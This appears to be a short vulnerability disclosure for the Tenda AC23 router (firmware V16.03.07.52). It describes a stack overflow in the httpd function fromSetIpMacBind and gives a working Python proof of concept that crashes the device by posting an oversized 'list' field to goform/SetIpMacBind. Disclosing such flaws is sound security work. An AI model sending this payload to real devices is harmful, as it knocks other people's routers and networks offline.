Overview

• The device's official website: AC23 概述 - 腾达Tenda官方网站
• Firmware download website: https://www.tenda.com.cn/material/show/3889

Affected version

AC23 V16.03.07.52

Vulnerability details

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the fromSetIpMacBind function, which is accessible via the URL goform/SetIpMacBind.

The function takes the POST argument list, does not verify its length, and copies it directly to a local variable on the stack, causing a stack overflow.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"list": b'A'*0x800,
    b"bindnum": b"1"
}
res = requests.post("<http://127.0.0.1/goform/SetIpMacBind>", data=data)
print(res.content)